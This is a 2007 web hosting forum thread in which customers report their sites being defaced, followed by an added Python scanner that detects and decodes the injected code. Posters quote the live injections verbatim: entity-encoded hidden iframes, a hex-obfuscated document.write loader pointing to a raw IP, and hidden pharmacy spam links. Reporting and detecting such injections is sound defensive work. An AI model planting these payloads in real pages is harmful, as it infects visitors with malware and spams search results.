Lunarpages Web Hosting Forum

Author Topic: Security Issue with Multiple Hosting Accounts (8/28/2007 - 9/14/2007)  (Read 21767 times)

Offline Pamiam

  • Newbie
  • Posts: 2
<script> appended to every index.*
« Reply #15 on: August 31, 2007, 07:54:35 AM »


That exact same thing happened to BOTH of my Lunarpages sites, and they were completely disabled. One site is my own, but my client on the other one is not pleased.  :(

For all of the hoops that lunarpages makes their customers jump through on security, this kind of thing still happens. I am not pleased, either.  :(


Offline scanman20

  • Senior Moderator
  • Über Jedi
  • Posts: 1556
    • http://www.notonebit.com
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #16 on: August 31, 2007, 08:42:52 AM »
I experienced the iframe hack on my sites about a week ago. Fortunately I was able to restore from my own backup. I would really like it if LP could analyze the server logs and try to determine exactly what happened. If nothing else I would at least like to learn from this experience. I find it interesting that I have been with LP for nearly five years and the one time I get hacked it appears to be spread across many LP customers, which leads me to believe that the problem is at a level higher than one user's account.
Even a broken clock is right twice a day.
NotOneBit.com
MCSE - MCSA - MCP (<- unused since 2006!)

Offline farreachfarm

  • Newbie
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #17 on: August 31, 2007, 07:31:29 PM »
I see instructions for accessing raw log files in CPanel... how is this done in Plesk?  The log files for the day my site was defaced are missing.

Offline farreachfarm

  • Newbie
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #18 on: August 31, 2007, 07:51:47 PM »
WHAT IS GOING ON HERE!!!!!????

My site was defaced again today (8/31/07)
This was added to my index.aspx (Windows-hosted site):

<!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Watch77, google counters... oh my!  Twice in a few days.

My webpage is super simple, just a placeholder.  No scripts, no nothing.  This is scary.

Appears to vector through "Global Net Access, LLC" IP address: 207.210.111.162

How do you block IP Addresses using Plesk?  I see instructions in the threads for CPanel.


Offline SteveW

  • Master Jedi
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #19 on: September 01, 2007, 01:41:34 AM »
How do you block IP Addresses using Plesk?  I see instructions in the threads for CPanel.
If there's nothing here in the forum try http://www.swsoft.com/plesk/, at the documentation link (PDF downloads). That might have something.

Offline pkchukiss

  • Newbie
  • Posts: 1
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #20 on: September 02, 2007, 05:33:02 PM »
Have you changed your passwords after the first attempt?

Offline JJ

  • Trekkie
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #21 on: September 03, 2007, 10:58:17 AM »
This has happened to both my web accounts several times now and I am getting very frustrated.

Can someone help me out with a couple of questions:

(1) "How" are the hackers able to do this? How can they update my index.php and login.php pages unless they know the passwords? If they know my passwords then I would have expected more damage.

(2) How on earth can I stop them from doing this again?!

To that end I have shut both websites down, well to be exact, I have password protected all directories which I assume will stop any attacks until I find the permanent fix?
« Last Edit: September 03, 2007, 11:11:03 AM by JJ »

Offline Peak

  • Spacescooter Operator
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #22 on: September 03, 2007, 11:57:28 AM »
Is there anyone else with a dedicated website who has been defaced? Right now, I'm rather annoyed that IPB has a million index.html and index.php files.

According to my logs (what little I have succeeded in deducing), the changes were uploaded through FTP. Apparently I've been hacked twice. The first one, I didn't notice. I saw that my recent backups had the iframes in them. The second one broke one of my IPB forums today, which made even me take notice.

I sent a ticket to LP over 12 hours ago, but haven't heard anything back. I would like to know if they did something else. I would hate to be a spam relay or something like that suddenly. I changed my passwords to the FTP, but who knows what else they did except changing the index files...

One other thing: What does that script do? Neither I nor my users have noticed a thing recently. No trojan downloads or anything like that...

//Peak

Offline JeremyD

  • SleePy...
  • Jabba the Hutt
  • Posts: 733
  • SMF Team Member
    • LcT Tribe
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #23 on: September 03, 2007, 01:38:09 PM »
Well, if you got hacked via an FTP account, I would assume it is one you created and not your cpanel one? Since these are not bugged by Lunarpages' own passwords that force good random passwords, you are most likely to put an easy password in there.
I would suggest using the same harder-to-guess passwords you do for your cpanel as with FTP. They are hard to remember at first. But I have gotten to where I can change my passwords and have them memorized in only 2 days. :yep:

JJ, these are just random attacks from scripts. Rarely do these actually come from a human anymore these days.
To help stop this you should have long, hard-to-guess random passwords. There are many random password generators out there and I have even built one myself that I use for my random passwords (it is very good at giving a random password).

Offline Peak

  • Spacescooter Operator
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #24 on: September 03, 2007, 01:40:57 PM »
My passwords aren't so easy to figure out (numbers and stuff). Got an answer from support now anyway. And both of them?

Don't have CPanel, only Webmin...

//Peak

Offline farreachfarm

  • Newbie
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #25 on: September 03, 2007, 07:40:22 PM »
I AM REALLY GETTING TIRED OF THIS.  This is the 3rd time that watch77 has been added to my index.aspx.  In fact this time it replaced my index.aspx entirely with:

<!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112" width="0" height="0" style="display:none"></iframe><!-- ~ -->

This attempts to install a downloader...

I have a dedicated IP address:  An anonymous FTP, NO Scripts, everything is password protected.  Lunarpages keeps saying "we are investigating", it's been many days and I see no indication that they found the hole.

Anyone have a clue how these hackers are getting in?

--Scott

Offline farreachfarm

  • Newbie
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #26 on: September 03, 2007, 08:20:35 PM »
I see from my logs that this script is being run --> http://www.filesdatabase.com/azenv.php from 60.212.81.102 (Asia Pacific blah blah... in AU).  I'm not sure I understand this, I'm not an IT guy, just a poor fool that wants a simple webpage... but from what I've read it can be used as a way for a local browser to discover open ports on an IP...  perhaps there are open ports on LP that they don't know about?

Note: I've changed my passwords a couple of times since this happened.

Again this is all new to me, and frankly I shouldn't have to worry about it.  I *was* going to have eCommerce added to my site eventually, but now I think that's out of the question.

I have an expert IT friend at AMD (the uCPU chip maker) that will take a look, I'll let you know what he finds.

Also thanks for telling me about the plesk usage document.

--Scott


Offline aiko

  • Spaceship Captain
  • Posts: 122
Re: Question for LP admins re: recent site defacements
« Reply #28 on: September 04, 2007, 07:33:04 AM »
I think that Lunarpages should seriously consider some sort of alert system that would e-mail webmasters when their website has been compromised.

I agree.

+ their websites will be automatically removed from the Google directory very soon.

Aiko
« Last Edit: September 04, 2007, 07:46:00 AM by aiko »

Offline aiko

  • Spaceship Captain
  • Posts: 122
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #29 on: September 04, 2007, 07:48:02 AM »
VERY IMPORTANT: PLEASE CHECK YOUR WEBSITES FOR DEFACEMENT BY HACKERS.

I host MANY websites with LP. Yesterday (8/27/2007) and this morning (8/28/2007) I had started receiving customer complaints that when they went to their sites, their anti-virus software alerted them that their sites were Trojan infected and many were blocked from seeing their sites. I would say that at least 20 or 30 of my clients are affected, all spread out on different LP servers (and yes, all sites have DIFFERENT FTP logins and passwords). There's nothing common among the sites - most of the sites are simple HTML pages - not scripts like forums, cms, or anything that would indicate a common pattern.

So, I went to investigate, and sure enough - all files named index.html or index.php, default.html or .php, home.html or .php (and in some cases login.php) have the following inserted in their body tags (or in the case of a PHP script, this was inserted at the bottom of the script). Not just the main directory, but all subdirectories that have index files have been affected as well. All files appear to be dated yesterday or today.

Here's what this defacing looks like:

<body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" bgcolor="#FFFFFF"><script>function v46d362555ac36(v46d362555b403){  return(parseInt(v46d362555b403,16));}function v46d362555cb88(v46d362555d354){  var v46d362555db26='';for(v46d362555e59a=0; v46d362555e59a<v46d362555d354.length; v46d362555e59a+=2){ v46d362555db26+=(String.fromCharCode(v46d362555ac36(v46d362555d354.substr(v46d362555e59a, 2))));}return v46d362555db26;} document.write(v46d362555cb88('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6231207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3931313534292B2766375C272077696474683D333833206865696768743D323338207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
So far, I have noticed the defacing on the following servers where SOME of my sites are hosted.

viola
atlas
stellar
sabik
danzig
savartos
hathor
prospero
naos
helium
mirach
galatea
centaur
angular
valkanos
omicron
aquarius

and counting... (I am discovering more and more as I try to fix my websites today and also change all FTP passwords - WHAT A PAIN!):



It also happened on LP dedicated servers.

I found another one today!

<div id="divId"><a href="http://dev.eurac.edu:8080/images/pps.gif/1/1/phentemine.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/1/phenteramine.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/1/phentermene.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/2/10-hydrocodone-lortab.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/2/357-hydrocodone.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/3/buy-viagra-in-ireland.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/3/buy-viagra-no-prescription.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/3/buy-viagra-pills.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/4/vicodin-online-canada.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/4/vicodin-online-prescriptions.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/5/xanax-no-prescription-required.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/5/xanax-no-prescription-us-pharmacy.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/6/100-tramadol.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/6/200mg-tramadol.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/7/valium-to-buy.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/8/buy-cialis-without-prescription.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/9/adipex-p-online.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/10/buy-ephedra-product.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/11/soma-pill-pictures.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/12/buy-levitra-online.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/13/ambien-prescribing.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/14/index.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/15/propecia-price.html"></a><a href="http://dev.eurac.edu:8080/images/pps.gif/1/17/100mg-zoloft.html"></a></div>

<script>eval(unescape("%76%61%72%20%64%69%76%45%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%69%76%49%64%22%29%3b%64%69%76%45%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%20%3d%22%6e%6f%6e%65%22%3b")); </script>

Aiko
« Last Edit: September 04, 2007, 08:29:40 AM by aiko »
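The posts above quote three different ways the injected code was hidden from a casual look at the page source: an iframe whose src is spelled out as HTML numeric character references (farreachfarm's `&#104&#116...` sample), a `document.write()` fed by a helper that turns two-digit hex pairs into characters (aiko's first sample), and an `eval(unescape("%xx..."))` blob (aiko's second sample). The scanner below is an added example for checking a docroot for these patterns and showing the analyst what each one decodes to; it is not code from the thread, from Lunarpages, or from any poster. The sample pages it scans are constructed for the example and use the placeholder host `bad.example` rather than the URLs the posters reported, and the list of file names it visits (index/default/home/login, any extension) follows aiko's description of which files were modified.

```python
"""Scan web-root files for the injected-iframe / obfuscated-script patterns
quoted in the Lunarpages thread and decode each payload for review.

Added example, not the thread's or the host's code. The SAMPLE_* pages are
constructed; bad.example is a placeholder host, not a reported indicator."""
import html
import os
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Comment markers the posters saw bracketing the injected iframe.
MARKER = "<!-- ~ -->"
# Pattern 1: <iframe> whose src is written as HTML numeric character references.
IFRAME_RE = re.compile(r'<iframe\s[^>]*?src="([^"]+)"[^>]*>', re.IGNORECASE)
# Pattern 2: document.write(decoder('HEX')) where decoder maps 2-digit hex pairs to chars.
HEX_WRITE_RE = re.compile(r"document\.write\(\w+\('([0-9A-Fa-f]+)'\)\)")
# Pattern 3: eval(unescape("%xx%xx...")).
EVAL_UNESCAPE_RE = re.compile(r'eval\(unescape\("((?:%[0-9A-Fa-f]{2})+)"\)\)')
# Attributes that make an iframe invisible to the visitor.
HIDDEN_RE = re.compile(r'width="?0"?|height="?0"?|display:\s*none', re.IGNORECASE)
# Base names the thread reports as targets (any extension).
TARGET_NAMES = {"index", "default", "home", "login"}

Finding = Tuple[str, str]  # (kind, decoded payload)


def decode_hex_pairs(hexstr: str) -> str:
    """Same transform as the injected helper: each 2-digit hex pair -> one character."""
    return bytes.fromhex(hexstr).decode("latin-1")


def scan_page(content: str) -> List[Finding]:
    """Return (kind, decoded payload) for every suspicious construct in one page."""
    findings: List[Finding] = []
    if MARKER in content:
        findings.append(("marker-comment", MARKER))
    for m in IFRAME_RE.finditer(content):
        raw_src = m.group(1)
        # html.unescape resolves &#104&#116... even when the semicolons are omitted.
        src = html.unescape(raw_src)
        # A plain, visible iframe is not reported; an entity-encoded or hidden one is.
        if "&#" in raw_src or HIDDEN_RE.search(m.group(0)):
            findings.append(("hidden-iframe", src))
    for m in HEX_WRITE_RE.finditer(content):
        findings.append(("hex-document-write", decode_hex_pairs(m.group(1))))
    for m in EVAL_UNESCAPE_RE.finditer(content):
        findings.append(("eval-unescape", unquote(m.group(1))))
    return findings


def scan_tree(root: str) -> Dict[str, List[Finding]]:
    """Walk a docroot and scan every index.*/default.*/home.*/login.* file."""
    report: Dict[str, List[Finding]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.rsplit(".", 1)[0].lower() in TARGET_NAMES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    found = scan_page(fh.read())
                if found:
                    report[path] = found
    return report


# --- constructed sample pages (placeholder host bad.example) ---
SAMPLE_ENTITY_IFRAME = (
    "<html><body>Placeholder page</body></html>"
    '<!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#98&#97&#100&#46&#101'
    '&#120&#97&#109&#112&#108&#101&#47&#105&#46&#112&#104&#112" width="0" height="0" '
    'style="display:none"></iframe><!-- ~ -->'
)
SAMPLE_HEX_SCRIPT = (
    "<body><script>function d(h){var o='';for(i=0;i<h.length;i+=2){"
    "o+=String.fromCharCode(parseInt(h.substr(i,2),16));}return o;}"
    " document.write(d('3C696672616D65207372633D22687474703A2F2F"
    "6261642E6578616D706C652F692E706870223E'));</script>"
)
SAMPLE_EVAL_UNESCAPE = (
    '<div id="x"></div><script>eval(unescape("%78%2e%73%74%79%6c%65%2e%64%69'
    '%73%70%6c%61%79%3d%22%6e%6f%6e%65%22")); </script>'
)
# A legitimate, visible embed: must not be reported.
SAMPLE_CLEAN = '<p>Hi</p><iframe src="http://video.example/embed" width="400" height="300"></iframe>'

if __name__ == "__main__":
    import sys

    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for kind, payload in found:
            print(f"{path}: {kind}: {payload}")
```

Run it against a downloaded copy of the docroot (`python scan.py /path/to/site`). Decoding the payload, rather than just flagging the file, is what lets the site owner see the remote host the hidden frame points at and report it; the clean sample shows that an ordinary visible iframe with real dimensions is left alone.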